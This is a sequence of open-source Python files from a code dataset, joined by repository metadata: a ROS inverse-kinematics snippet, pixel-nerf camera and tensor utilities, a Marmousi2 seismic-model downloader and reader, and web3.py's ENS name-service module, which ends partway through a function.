Frame(Point(0.698, 0.299, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.766, 0.297, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000))
]
# Loads the robot from ROS
with RosClient('localhost') as client:
robot = client.load_robot()
# And call our assignment functions for each frame in the example
configurations = []
for frame in frame_list:
configuration = calculate_ik(robot, frame)
configurations.append(configuration)
print("Found configuration", configuration)
store_configurations(configurations)
| 48.854839
| 120
| 0.679762
|
59ef87b582c06e01fd47588ae7e4513cdf32250e
| 15,675
|
py
|
Python
|
src/util/util.py
|
Depersonalizc/pixel-nerf
|
35e70fdecdac49b75764158e01d6751b7ad87910
|
[
"BSD-2-Clause"
] | 703
|
2020-12-04T02:41:05.000Z
|
2022-03-31T07:59:50.000Z
|
src/util/util.py
|
Depersonalizc/pixel-nerf
|
35e70fdecdac49b75764158e01d6751b7ad87910
|
[
"BSD-2-Clause"
] | 46
|
2020-12-08T23:00:54.000Z
|
2022-03-26T03:06:07.000Z
|
src/util/util.py
|
Depersonalizc/pixel-nerf
|
35e70fdecdac49b75764158e01d6751b7ad87910
|
[
"BSD-2-Clause"
] | 118
|
2020-12-04T05:37:11.000Z
|
2022-03-28T03:34:50.000Z
|
import cv2
import numpy as np
import torch
from torchvision import transforms
from torch import nn
from torch.nn import init
import torch.nn.functional as F
import functools
import math
import warnings
def image_float_to_uint8(img):
"""
Convert a float image (0.0-1.0) to uint8 (0-255)
"""
vmin = np.min(img)
vmax = np.max(img)
if vmax - vmin < 1e-10:
vmax += 1e-10
img = (img - vmin) / (vmax - vmin)
img *= 255.0
return img.astype(np.uint8)
def cmap(img, color_map=cv2.COLORMAP_HOT):
"""
Apply 'HOT' color to a float image
"""
return cv2.applyColorMap(image_float_to_uint8(img), color_map)
def batched_index_select_nd(t, inds):
"""
Index select on dim 1 of a n-dimensional batched tensor.
:param t (batch, n, ...)
:param inds (batch, k)
:return (batch, k, ...)
"""
return t.gather(
1, inds[(...,) + (None,) * (len(t.shape) - 2)].expand(-1, -1, *t.shape[2:])
)
def batched_index_select_nd_last(t, inds):
"""
Index select on dim -1 of a >=2D multi-batched tensor. inds assumed
to have all batch dimensions except one data dimension 'n'
:param t (batch..., n, m)
:param inds (batch..., k)
:return (batch..., n, k)
"""
dummy = inds.unsqueeze(-2).expand(*inds.shape[:-1], t.size(-2), inds.size(-1))
out = t.gather(-1, dummy)
return out
def repeat_interleave(input, repeats, dim=0):
"""
Repeat interleave along axis 0
torch.repeat_interleave is currently very slow
https://github.com/pytorch/pytorch/issues/31980
"""
output = input.unsqueeze(1).expand(-1, repeats, *input.shape[1:])
return output.reshape(-1, *input.shape[1:])
def get_image_to_tensor_balanced(image_size=0):
ops = []
if image_size > 0:
ops.append(transforms.Resize(image_size))
ops.extend(
[transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),]
)
return transforms.Compose(ops)
def get_mask_to_tensor():
return transforms.Compose(
[transforms.ToTensor(), transforms.Normalize((0.0,), (1.0,))]
)
def homogeneous(points):
"""
Concat 1 to each point
:param points (..., 3)
:return (..., 4)
"""
return F.pad(points, (0, 1), "constant", 1.0)
def gen_grid(*args, ij_indexing=False):
"""
Generete len(args)-dimensional grid.
Each arg should be (lo, hi, sz) so that in that dimension points
are taken at linspace(lo, hi, sz).
Example: gen_grid((0,1,10), (-1,1,20))
:return (prod_i args_i[2], len(args)), len(args)-dimensional grid points
"""
return torch.from_numpy(
np.vstack(
np.meshgrid(
*(np.linspace(lo, hi, sz, dtype=np.float32) for lo, hi, sz in args),
indexing="ij" if ij_indexing else "xy"
)
)
.reshape(len(args), -1)
.T
)
def unproj_map(width, height, f, c=None, device="cpu"):
"""
Get camera unprojection map for given image size.
[y,x] of output tensor will contain unit vector of camera ray of that pixel.
:param width image width
:param height image height
:param f focal length, either a number or tensor [fx, fy]
:param c principal point, optional, either None or tensor [fx, fy]
if not specified uses center of image
:return unproj map (height, width, 3)
"""
if c is None:
c = [width * 0.5, height * 0.5]
else:
c = c.squeeze()
if isinstance(f, float):
f = [f, f]
elif len(f.shape) == 0:
f = f[None].expand(2)
elif len(f.shape) == 1:
f = f.expand(2)
Y, X = torch.meshgrid(
torch.arange(height, dtype=torch.float32) - float(c[1]),
torch.arange(width, dtype=torch.float32) - float(c[0]),
)
X = X.to(device=device) / float(f[0])
Y = Y.to(device=device) / float(f[1])
Z = torch.ones_like(X)
unproj = torch.stack((X, -Y, -Z), dim=-1)
unproj /= torch.norm(unproj, dim=-1).unsqueeze(-1)
return unproj
def coord_from_blender(dtype=torch.float32, device="cpu"):
"""
Blender to standard coordinate system transform.
Standard coordinate system is: x right y up z out (out=screen to face)
Blender coordinate system is: x right y in z up
:return (4, 4)
"""
return torch.tensor(
[[1, 0, 0, 0], [0, 0, 1, 0], [0, -1, 0, 0], [0, 0, 0, 1]],
dtype=dtype,
device=device,
)
def coord_to_blender(dtype=torch.float32, device="cpu"):
"""
Standard to Blender coordinate system transform.
Standard coordinate system is: x right y up z out (out=screen to face)
Blender coordinate system is: x right y in z up
:return (4, 4)
"""
return torch.tensor(
[[1, 0, 0, 0], [0, 0, -1, 0], [0, 1, 0, 0], [0, 0, 0, 1]],
dtype=dtype,
device=device,
)
def look_at(origin, target, world_up=np.array([0, 1, 0], dtype=np.float32)):
"""
Get 4x4 camera to world space matrix, for camera looking at target
"""
back = origin - target
back /= np.linalg.norm(back)
right = np.cross(world_up, back)
right /= np.linalg.norm(right)
up = np.cross(back, right)
cam_to_world = np.empty((4, 4), dtype=np.float32)
cam_to_world[:3, 0] = right
cam_to_world[:3, 1] = up
cam_to_world[:3, 2] = back
cam_to_world[:3, 3] = origin
cam_to_world[3, :] = [0, 0, 0, 1]
return cam_to_world
def get_cuda(gpu_id):
"""
Get a torch.device for GPU gpu_id. If GPU not available,
returns CPU device.
"""
return (
torch.device("cuda:%d" % gpu_id)
if torch.cuda.is_available()
else torch.device("cpu")
)
def masked_sample(masks, num_pix, prop_inside, thresh=0.5):
"""
:return (num_pix, 3)
"""
num_inside = int(num_pix * prop_inside + 0.5)
num_outside = num_pix - num_inside
inside = (masks >= thresh).nonzero(as_tuple=False)
outside = (masks < thresh).nonzero(as_tuple=False)
pix_inside = inside[torch.randint(0, inside.shape[0], (num_inside,))]
pix_outside = outside[torch.randint(0, outside.shape[0], (num_outside,))]
pix = torch.cat((pix_inside, pix_outside))
return pix
def bbox_sample(bboxes, num_pix):
"""
:return (num_pix, 3)
"""
image_ids = torch.randint(0, bboxes.shape[0], (num_pix,))
pix_bboxes = bboxes[image_ids]
x = (
torch.rand(num_pix) * (pix_bboxes[:, 2] + 1 - pix_bboxes[:, 0])
+ pix_bboxes[:, 0]
).long()
y = (
torch.rand(num_pix) * (pix_bboxes[:, 3] + 1 - pix_bboxes[:, 1])
+ pix_bboxes[:, 1]
).long()
pix = torch.stack((image_ids, y, x), dim=-1)
return pix
def gen_rays(poses, width, height, focal, z_near, z_far, c=None, ndc=False):
"""
Generate camera rays
:return (B, H, W, 8)
"""
num_images = poses.shape[0]
device = poses.device
cam_unproj_map = (
unproj_map(width, height, focal.squeeze(), c=c, device=device)
.unsqueeze(0)
.repeat(num_images, 1, 1, 1)
)
cam_centers = poses[:, None, None, :3, 3].expand(-1, height, width, -1)
cam_raydir = torch.matmul(
poses[:, None, None, :3, :3], cam_unproj_map.unsqueeze(-1)
)[:, :, :, :, 0]
if ndc:
if not (z_near == 0 and z_far == 1):
warnings.warn(
"dataset z near and z_far not compatible with NDC, setting them to 0, 1 NOW"
)
z_near, z_far = 0.0, 1.0
cam_centers, cam_raydir = ndc_rays(
width, height, focal, 1.0, cam_centers, cam_raydir
)
cam_nears = (
torch.tensor(z_near, device=device)
.view(1, 1, 1, 1)
.expand(num_images, height, width, -1)
)
cam_fars = (
torch.tensor(z_far, device=device)
.view(1, 1, 1, 1)
.expand(num_images, height, width, -1)
)
return torch.cat(
(cam_centers, cam_raydir, cam_nears, cam_fars), dim=-1
) # (B, H, W, 8)
def trans_t(t):
return torch.tensor(
[[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, t], [0, 0, 0, 1],], dtype=torch.float32,
)
def rot_phi(phi):
return torch.tensor(
[
[1, 0, 0, 0],
[0, np.cos(phi), -np.sin(phi), 0],
[0, np.sin(phi), np.cos(phi), 0],
[0, 0, 0, 1],
],
dtype=torch.float32,
)
def rot_theta(th):
return torch.tensor(
[
[np.cos(th), 0, -np.sin(th), 0],
[0, 1, 0, 0],
[np.sin(th), 0, np.cos(th), 0],
[0, 0, 0, 1],
],
dtype=torch.float32,
)
def pose_spherical(theta, phi, radius):
"""
Spherical rendering poses, from NeRF
"""
c2w = trans_t(radius)
c2w = rot_phi(phi / 180.0 * np.pi) @ c2w
c2w = rot_theta(theta / 180.0 * np.pi) @ c2w
c2w = (
torch.tensor(
[[-1, 0, 0, 0], [0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1]],
dtype=torch.float32,
)
@ c2w
)
return c2w
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def get_norm_layer(norm_type="instance", group_norm_groups=32):
"""Return a normalization layer
Parameters:
norm_type (str) -- the name of the normalization layer: batch | instance | none
For BatchNorm, we use learnable affine parameters and track running statistics (mean/stddev).
For InstanceNorm, we do not use learnable affine parameters. We do not track running statistics.
"""
if norm_type == "batch":
norm_layer = functools.partial(
nn.BatchNorm2d, affine=True, track_running_stats=True
)
elif norm_type == "instance":
norm_layer = functools.partial(
nn.InstanceNorm2d, affine=False, track_running_stats=False
)
elif norm_type == "group":
norm_layer = functools.partial(nn.GroupNorm, group_norm_groups)
elif norm_type == "none":
norm_layer = None
else:
raise NotImplementedError("normalization layer [%s] is not found" % norm_type)
return norm_layer
def make_conv_2d(
dim_in,
dim_out,
padding_type="reflect",
norm_layer=None,
activation=None,
kernel_size=3,
use_bias=False,
stride=1,
no_pad=False,
zero_init=False,
):
conv_block = []
amt = kernel_size // 2
if stride > 1 and not no_pad:
raise NotImplementedError(
"Padding with stride > 1 not supported, use same_pad_conv2d"
)
if amt > 0 and not no_pad:
if padding_type == "reflect":
conv_block += [nn.ReflectionPad2d(amt)]
elif padding_type == "replicate":
conv_block += [nn.ReplicationPad2d(amt)]
elif padding_type == "zero":
conv_block += [nn.ZeroPad2d(amt)]
else:
raise NotImplementedError("padding [%s] is not implemented" % padding_type)
conv_block.append(
nn.Conv2d(
dim_in, dim_out, kernel_size=kernel_size, bias=use_bias, stride=stride
)
)
if zero_init:
nn.init.zeros_(conv_block[-1].weight)
# else:
# nn.init.kaiming_normal_(conv_block[-1].weight)
if norm_layer is not None:
conv_block.append(norm_layer(dim_out))
if activation is not None:
conv_block.append(activation)
return nn.Sequential(*conv_block)
def calc_same_pad_conv2d(t_shape, kernel_size=3, stride=1):
in_height, in_width = t_shape[-2:]
out_height = math.ceil(in_height / stride)
out_width = math.ceil(in_width / stride)
pad_along_height = max((out_height - 1) * stride + kernel_size - in_height, 0)
pad_along_width = max((out_width - 1) * stride + kernel_size - in_width, 0)
pad_top = pad_along_height // 2
pad_bottom = pad_along_height - pad_top
pad_left = pad_along_width // 2
pad_right = pad_along_width - pad_left
return pad_left, pad_right, pad_top, pad_bottom
def same_pad_conv2d(t, padding_type="reflect", kernel_size=3, stride=1, layer=None):
"""
Perform SAME padding on tensor, given kernel size/stride of conv operator
assumes kernel/stride are equal in all dimensions.
Use before conv called.
Dilation not supported.
:param t image tensor input (B, C, H, W)
:param padding_type padding type constant | reflect | replicate | circular
constant is 0-pad.
:param kernel_size kernel size of conv
:param stride stride of conv
:param layer optionally, pass conv layer to automatically get kernel_size and stride
(overrides these)
"""
if layer is not None:
if isinstance(layer, nn.Sequential):
layer = next(layer.children())
kernel_size = layer.kernel_size[0]
stride = layer.stride[0]
return F.pad(
t, calc_same_pad_conv2d(t.shape, kernel_size, stride), mode=padding_type
)
def same_unpad_deconv2d(t, kernel_size=3, stride=1, layer=None):
"""
Perform SAME unpad on tensor, given kernel/stride of deconv operator.
Use after deconv called.
Dilation not supported.
"""
if layer is not None:
if isinstance(layer, nn.Sequential):
layer = next(layer.children())
kernel_size = layer.kernel_size[0]
stride = layer.stride[0]
h_scaled = (t.shape[-2] - 1) * stride
w_scaled = (t.shape[-1] - 1) * stride
pad_left, pad_right, pad_top, pad_bottom = calc_same_pad_conv2d(
(h_scaled, w_scaled), kernel_size, stride
)
if pad_right == 0:
pad_right = -10000
if pad_bottom == 0:
pad_bottom = -10000
return t[..., pad_top:-pad_bottom, pad_left:-pad_right]
def combine_interleaved(t, inner_dims=(1,), agg_type="average"):
if len(inner_dims) == 1 and inner_dims[0] == 1:
return t
t = t.reshape(-1, *inner_dims, *t.shape[1:])
if agg_type == "average":
t = torch.mean(t, dim=1)
elif agg_type == "max":
t = torch.max(t, dim=1)[0]
else:
raise NotImplementedError("Unsupported combine type " + agg_type)
return t
def psnr(pred, target):
"""
Compute PSNR of two tensors in decibels.
pred/target should be of same size or broadcastable
"""
mse = ((pred - target) ** 2).mean()
psnr = -10 * math.log10(mse)
return psnr
def quat_to_rot(q):
"""
Quaternion to rotation matrix
"""
batch_size, _ = q.shape
q = F.normalize(q, dim=1)
R = torch.ones((batch_size, 3, 3), device=q.device)
qr = q[:, 0]
qi = q[:, 1]
qj = q[:, 2]
qk = q[:, 3]
R[:, 0, 0] = 1 - 2 * (qj ** 2 + qk ** 2)
R[:, 0, 1] = 2 * (qj * qi - qk * qr)
R[:, 0, 2] = 2 * (qi * qk + qr * qj)
R[:, 1, 0] = 2 * (qj * qi + qk * qr)
R[:, 1, 1] = 1 - 2 * (qi ** 2 + qk ** 2)
R[:, 1, 2] = 2 * (qj * qk - qi * qr)
R[:, 2, 0] = 2 * (qk * qi - qj * qr)
R[:, 2, 1] = 2 * (qj * qk + qi * qr)
R[:, 2, 2] = 1 - 2 * (qi ** 2 + qj ** 2)
return R
def rot_to_quat(R):
"""
Rotation matrix to quaternion
"""
batch_size, _, _ = R.shape
q = torch.ones((batch_size, 4), device=R.device)
R00 = R[:, 0, 0]
R01 = R[:, 0, 1]
R02 = R[:, 0, 2]
R10 = R[:, 1, 0]
R11 = R[:, 1, 1]
R12 = R[:, 1, 2]
R20 = R[:, 2, 0]
R21 = R[:, 2, 1]
R22 = R[:, 2, 2]
q[:, 0] = torch.sqrt(1.0 + R00 + R11 + R22) / 2
q[:, 1] = (R21 - R12) / (4 * q[:, 0])
q[:, 2] = (R02 - R20) / (4 * q[:, 0])
q[:, 3] = (R10 - R01) / (4 * q[:, 0])
return q
def get_module(net):
"""
Shorthand for either net.module (if net is instance of DataParallel) or net
"""
if isinstance(net, torch.nn.DataParallel):
return net.module
else:
return net
| 29.081633
| 100
| 0.583349
|
f8c72f5c3e8213dd831b99c6d1d8d2bf2995f7a8
| 4,070
|
py
|
Python
|
marmousi/marmousi2_tools.py
|
HSE-LAMBDA/RheologyReconstruction
|
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
|
[
"Apache-2.0"
] | 1
|
2021-01-12T11:43:31.000Z
|
2021-01-12T11:43:31.000Z
|
marmousi/marmousi2_tools.py
|
HSE-LAMBDA/RheologyReconstruction
|
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
|
[
"Apache-2.0"
] | null | null | null |
marmousi/marmousi2_tools.py
|
HSE-LAMBDA/RheologyReconstruction
|
fe89dea28ab0873d075e69c51e9ae2aeb07fe8e2
|
[
"Apache-2.0"
] | null | null | null |
import os
import shutil
import requests
from tqdm import tqdm
from obspy.io.segy.core import _read_segy
import numpy as np
import matplotlib.pyplot as plt
def get_marmousi2_data_location():
# download link and friends
SOURCE_URL = "https://s3.amazonaws.com/open.source.geoscience/open_data/elastic-marmousi/elastic-marmousi-model.tar.gz"
PACKED_FILE_NAME = SOURCE_URL.split('/')[-1]
FOLDER_NAME = PACKED_FILE_NAME.split('.')[0]
# model files names (we know them from MARMOUSI2 spec)
DENSITY_FILE = os.path.join(FOLDER_NAME, "model", "MODEL_DENSITY_1.25m.segy")
P_WAVE_VELOCITY_FILE = os.path.join(FOLDER_NAME, "model", "MODEL_P-WAVE_VELOCITY_1.25m.segy")
S_WAVE_VELOCITY_FILE = os.path.join(FOLDER_NAME, "model", "MODEL_S-WAVE_VELOCITY_1.25m.segy")
return (SOURCE_URL, PACKED_FILE_NAME, FOLDER_NAME, DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE)
def get_marmousi2_model_params():
# space steps, in meters (we know them from MARMOUSI2 spec)
DX = 1.25
DZ = 1.25
# number of space steps
NUM_X = 13601
NUM_Z = 2801
return (DX, DZ, NUM_X, NUM_Z)
def download(url: str, fname: str):
resp = requests.get(url, stream=True)
total = int(resp.headers.get('content-length', 0))
with open(fname, 'wb') as file, tqdm(
desc=fname,
total=total,
unit='iB',
unit_scale=True,
unit_divisor=1024,
) as bar:
for data in resp.iter_content(chunk_size=1024):
size = file.write(data)
bar.update(size)
def get_and_unpack_data():
print("Local data not found! We are going to prepare it. Please, be patient, it will take some time.")
(SOURCE_URL, PACKED_FILE_NAME, FOLDER_NAME, DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE) = get_marmousi2_data_location()
print("Downloading elastic marmousi model")
download(SOURCE_URL, PACKED_FILE_NAME)
print("Unpacking elastic marmousi model")
shutil.unpack_archive(PACKED_FILE_NAME)
for f in [DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE]:
shutil.unpack_archive(f + ".tar.gz", os.path.split(f)[0])
print("Done")
def read_data(start_z = 0.0, stop_z = 3500.0, start_x = 0.0, stop_x = 17000.0, coarse_factor = 1):
(SOURCE_URL, PACKED_FILE_NAME, FOLDER_NAME, DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE) \
= get_marmousi2_data_location()
if not os.path.exists(FOLDER_NAME):
get_and_unpack_data()
(DX, DZ, NUM_X, NUM_Z) = get_marmousi2_model_params()
rho_coeffs = np.zeros((NUM_Z, NUM_X))
cp_coeffs = np.zeros((NUM_Z, NUM_X))
cs_coeffs = np.zeros((NUM_Z, NUM_X))
start_x_ind = int(start_x / DX)
stop_x_ind = 1 + int(stop_x / DX)
start_z_ind = int(start_z / DZ)
stop_z_ind = 1 + int(stop_z / DZ)
_ = [rho_coeffs, cp_coeffs, cs_coeffs]
for q, f in enumerate([DENSITY_FILE, P_WAVE_VELOCITY_FILE, S_WAVE_VELOCITY_FILE]):
print("Reading", f)
segy = _read_segy(f)
for i, tr in enumerate(segy.traces):
_[q][:, i] = tr.data
# clip & coarse & inverse Z-axis
rho_coeffs = rho_coeffs[stop_z_ind:start_z_ind:-coarse_factor, start_x_ind:stop_x_ind:coarse_factor]
cp_coeffs = cp_coeffs[stop_z_ind:start_z_ind:-coarse_factor, start_x_ind:stop_x_ind:coarse_factor]
cs_coeffs = cs_coeffs[stop_z_ind:start_z_ind:-coarse_factor, start_x_ind:stop_x_ind:coarse_factor]
rho_coeffs *= 1000
mu_coeffs = rho_coeffs * np.square(cs_coeffs)
la_coeffs = rho_coeffs * (np.square(cp_coeffs) - 2 * np.square(cs_coeffs))
return (rho_coeffs, cp_coeffs, cs_coeffs, la_coeffs, mu_coeffs)
def show(data, title, start_z = 0.0, stop_z = 3500.0, start_x = 0.0, stop_x = 17000.0):
nz, nx = data.shape
fig, ax = plt.subplots()
ax.set_aspect('equal')
im = ax.pcolormesh(np.linspace(start_x, stop_x, nx), np.linspace(-stop_z, -start_z, nz), data)
fig.colorbar(im, ax=ax, orientation='horizontal')
ax.set_title(title)
fig.tight_layout()
plt.show()
| 33.089431
| 137
| 0.692875
|
e214512d5be19e5e29ce15b38dd48ea538abb606
| 14,381
|
py
|
Python
|
ens/main.py
|
ayushkumar63123/web3.py
|
4dda2db9d27a409f1a9c2b4a8ec917b53c51383f
|
[
"MIT"
] | 3,041
|
2017-11-22T16:23:46.000Z
|
2022-03-31T15:19:39.000Z
|
ens/main.py
|
ayushkumar63123/web3.py
|
4dda2db9d27a409f1a9c2b4a8ec917b53c51383f
|
[
"MIT"
] | 1,506
|
2017-11-22T15:44:34.000Z
|
2022-03-31T18:40:05.000Z
|
ens/main.py
|
ayushkumar63123/web3.py
|
4dda2db9d27a409f1a9c2b4a8ec917b53c51383f
|
[
"MIT"
] | 1,095
|
2017-11-22T18:20:22.000Z
|
2022-03-31T13:05:31.000Z
|
from functools import (
wraps,
)
from typing import (
TYPE_CHECKING,
Optional,
Sequence,
Tuple,
Union,
cast,
)
from eth_typing import (
Address,
ChecksumAddress,
HexAddress,
)
from eth_utils import (
is_binary_address,
is_checksum_address,
to_checksum_address,
)
from hexbytes import (
HexBytes,
)
from ens import abis
from ens.constants import (
EMPTY_ADDR_HEX,
ENS_MAINNET_ADDR,
REVERSE_REGISTRAR_DOMAIN,
)
from ens.exceptions import (
AddressMismatch,
UnauthorizedError,
UnownedName,
)
from ens.utils import (
address_in,
address_to_reverse_domain,
default,
dict_copy,
init_web3,
is_none_or_zero_address,
is_valid_name,
label_to_hash,
normal_name_to_hash,
normalize_name,
raw_name_to_hash,
)
if TYPE_CHECKING:
from web3 import Web3 # noqa: F401
from web3.contract import ( # noqa: F401
Contract,
)
from web3.providers import ( # noqa: F401
BaseProvider,
)
from web3.types import ( # noqa: F401
TxParams,
)
class ENS:
"""
Quick access to common Ethereum Name Service functions,
like getting the address for a name.
Unless otherwise specified, all addresses are assumed to be a `str` in
`checksum format <https://github.com/ethereum/EIPs/blob/master/EIPS/eip-155.md>`_,
like: ``"0x314159265dD8dbb310642f98f50C066173C1259b"``
"""
@staticmethod
@wraps(label_to_hash)
def labelhash(label: str) -> HexBytes:
return label_to_hash(label)
@staticmethod
@wraps(raw_name_to_hash)
def namehash(name: str) -> HexBytes:
return raw_name_to_hash(name)
@staticmethod
@wraps(normalize_name)
def nameprep(name: str) -> str:
return normalize_name(name)
@staticmethod
@wraps(is_valid_name)
def is_valid_name(name: str) -> bool:
return is_valid_name(name)
@staticmethod
@wraps(address_to_reverse_domain)
def reverse_domain(address: ChecksumAddress) -> str:
return address_to_reverse_domain(address)
def __init__(
self, provider: 'BaseProvider' = cast('BaseProvider', default), addr: ChecksumAddress = None
) -> None:
"""
:param provider: a single provider used to connect to Ethereum
:type provider: instance of `web3.providers.base.BaseProvider`
:param hex-string addr: the address of the ENS registry on-chain. If not provided,
ENS.py will default to the mainnet ENS registry address.
"""
self.web3 = init_web3(provider)
ens_addr = addr if addr else ENS_MAINNET_ADDR
self.ens = self.web3.eth.contract(abi=abis.ENS, address=ens_addr)
self._resolverContract = self.web3.eth.contract(abi=abis.RESOLVER)
@classmethod
def fromWeb3(cls, web3: 'Web3', addr: ChecksumAddress = None) -> 'ENS':
"""
Generate an ENS instance with web3
:param `web3.Web3` web3: to infer connection information
:param hex-string addr: the address of the ENS registry on-chain. If not provided,
ENS.py will default to the mainnet ENS registry address.
"""
return cls(web3.manager.provider, addr=addr)
def address(self, name: str) -> Optional[ChecksumAddress]:
"""
Look up the Ethereum address that `name` currently points to.
:param str name: an ENS name to look up
:raises InvalidName: if `name` has invalid syntax
"""
return cast(ChecksumAddress, self.resolve(name, 'addr'))
def name(self, address: ChecksumAddress) -> Optional[str]:
"""
Look up the name that the address points to, using a
reverse lookup. Reverse lookup is opt-in for name owners.
:param address:
:type address: hex-string
"""
reversed_domain = address_to_reverse_domain(address)
return self.resolve(reversed_domain, get='name')
@dict_copy
def setup_address(
self,
name: str,
address: Union[Address, ChecksumAddress, HexAddress] = cast(ChecksumAddress, default),
transact: "TxParams" = {}
) -> HexBytes:
"""
Set up the name to point to the supplied address.
The sender of the transaction must own the name, or
its parent name.
Example: If the caller owns ``parentname.eth`` with no subdomains
and calls this method with ``sub.parentname.eth``,
then ``sub`` will be created as part of this call.
:param str name: ENS name to set up
:param str address: name will point to this address, in checksum format. If ``None``,
erase the record. If not specified, name will point to the owner's address.
:param dict transact: the transaction configuration, like in
:meth:`~web3.eth.Eth.send_transaction`
:raises InvalidName: if ``name`` has invalid syntax
:raises UnauthorizedError: if ``'from'`` in `transact` does not own `name`
"""
owner = self.setup_owner(name, transact=transact)
self._assert_control(owner, name)
if is_none_or_zero_address(address):
address = None
elif address is default:
address = owner
elif is_binary_address(address):
address = to_checksum_address(cast(str, address))
elif not is_checksum_address(address):
raise ValueError("You must supply the address in checksum format")
if self.address(name) == address:
return None
if address is None:
address = EMPTY_ADDR_HEX
transact['from'] = owner
resolver: 'Contract' = self._set_resolver(name, transact=transact)
return resolver.functions.setAddr(raw_name_to_hash(name), address).transact(transact)
@dict_copy
def setup_name(
self, name: str, address: ChecksumAddress = None, transact: "TxParams" = {}
) -> HexBytes:
"""
Set up the address for reverse lookup, aka "caller ID".
After successful setup, the method :meth:`~ens.main.ENS.name` will return
`name` when supplied with `address`.
:param str name: ENS name that address will point to
:param str address: to set up, in checksum format
:param dict transact: the transaction configuration, like in
:meth:`~web3.eth.send_transaction`
:raises AddressMismatch: if the name does not already point to the address
:raises InvalidName: if `name` has invalid syntax
:raises UnauthorizedError: if ``'from'`` in `transact` does not own `name`
:raises UnownedName: if no one owns `name`
"""
if not name:
self._assert_control(address, 'the reverse record')
return self._setup_reverse(None, address, transact=transact)
else:
resolved = self.address(name)
if is_none_or_zero_address(address):
address = resolved
elif resolved and address != resolved and resolved != EMPTY_ADDR_HEX:
raise AddressMismatch(
"Could not set address %r to point to name, because the name resolves to %r. "
"To change the name for an existing address, call setup_address() first." % (
address, resolved
)
)
if is_none_or_zero_address(address):
address = self.owner(name)
if is_none_or_zero_address(address):
raise UnownedName("claim subdomain using setup_address() first")
if is_binary_address(address):
address = to_checksum_address(address)
if not is_checksum_address(address):
raise ValueError("You must supply the address in checksum format")
self._assert_control(address, name)
if not resolved:
self.setup_address(name, address, transact=transact)
return self._setup_reverse(name, address, transact=transact)
def resolve(self, name: str, get: str = 'addr') -> Optional[Union[ChecksumAddress, str]]:
normal_name = normalize_name(name)
resolver = self.resolver(normal_name)
if resolver:
lookup_function = getattr(resolver.functions, get)
namehash = normal_name_to_hash(normal_name)
address = lookup_function(namehash).call()
if is_none_or_zero_address(address):
return None
return lookup_function(namehash).call()
else:
return None
def resolver(self, normal_name: str) -> Optional['Contract']:
resolver_addr = self.ens.caller.resolver(normal_name_to_hash(normal_name))
if is_none_or_zero_address(resolver_addr):
return None
return self._resolverContract(address=resolver_addr)
def reverser(self, target_address: ChecksumAddress) -> Optional['Contract']:
reversed_domain = address_to_reverse_domain(target_address)
return self.resolver(reversed_domain)
def owner(self, name: str) -> ChecksumAddress:
"""
Get the owner of a name. Note that this may be different from the
deed holder in the '.eth' registrar. Learn more about the difference
between deed and name ownership in the ENS `Managing Ownership docs
<http://docs.ens.domains/en/latest/userguide.html#managing-ownership>`_
:param str name: ENS name to look up
:return: owner address
:rtype: str
"""
node = raw_name_to_hash(name)
return self.ens.caller.owner(node)
@dict_copy
def setup_owner(
self,
name: str,
new_owner: ChecksumAddress = cast(ChecksumAddress, default),
transact: "TxParams" = {}
) -> ChecksumAddress:
"""
Set the owner of the supplied name to `new_owner`.
For typical scenarios, you'll never need to call this method directly,
simply call :meth:`setup_name` or :meth:`setup_address`. This method does *not*
set up the name to point to an address.
If `new_owner` is not supplied, then this will assume you
want the same owner as the parent domain.
If the caller owns ``parentname.eth`` with no subdomains
and calls this method with ``sub.parentname.eth``,
then ``sub`` will be created as part of this call.
:param str name: ENS name to set up
:param new_owner: account that will own `name`. If ``None``, set owner to empty addr.
If not specified, name will point to the parent domain owner's address.
:param dict transact: the transaction configuration, like in
:meth:`~web3.eth.Eth.send_transaction`
:raises InvalidName: if `name` has invalid syntax
:raises UnauthorizedError: if ``'from'`` in `transact` does not own `name`
:returns: the new owner's address
"""
(super_owner, unowned, owned) = self._first_owner(name)
if new_owner is default:
new_owner = super_owner
elif not new_owner:
new_owner = ChecksumAddress(EMPTY_ADDR_HEX)
else:
new_owner = to_checksum_address(new_owner)
current_owner = self.owner(name)
if new_owner == EMPTY_ADDR_HEX and not current_owner:
return None
elif current_owner == new_owner:
return current_owner
else:
self._assert_control(super_owner, name, owned)
self._claim_ownership(new_owner, unowned, owned, super_owner, transact=transact)
return new_owner
def _assert_control(self, account: ChecksumAddress, name: str,
parent_owned: Optional[str] = None) -> None:
if not address_in(account, self.web3.eth.accounts):
raise UnauthorizedError(
"in order to modify %r, you must control account %r, which owns %r" % (
name, account, parent_owned or name
)
)
def _first_owner(self, name: str) -> Tuple[Optional[ChecksumAddress], Sequence[str], str]:
"""
Takes a name, and returns the owner of the deepest subdomain that has an owner
:returns: (owner or None, list(unowned_subdomain_labels), first_owned_domain)
"""
owner = None
unowned = []
pieces = normalize_name(name).split('.')
while pieces and is_none_or_zero_address(owner):
name = '.'.join(pieces)
owner = self.owner(name)
if is_none_or_zero_address(owner):
unowned.append(pieces.pop(0))
return (owner, unowned, name)
@dict_copy
def _claim_ownership(
self,
owner: ChecksumAddress,
unowned: Sequence[str],
owned: str,
old_owner: ChecksumAddress = None,
transact: "TxParams" = {}
) -> None:
transact['from'] = old_owner or owner
for label in reversed(unowned):
self.ens.functions.setSubnodeOwner(
raw_name_to_hash(owned),
label_to_hash(label),
owner
).transact(transact)
owned = "%s.%s" % (label, owned)
@dict_copy
def _set_resolver(
self, name: str, resolver_addr: ChecksumAddress = None, transact: "TxParams" = {}
) -> 'Contract':
if is_none_or_zero_address(resolver_addr):
resolver_addr = self.address('resolver.eth')
namehash = raw_name_to_hash(name)
if self.ens.caller.resolver(namehash) != resolver_addr:
self.ens.functions.setResolver(
namehash,
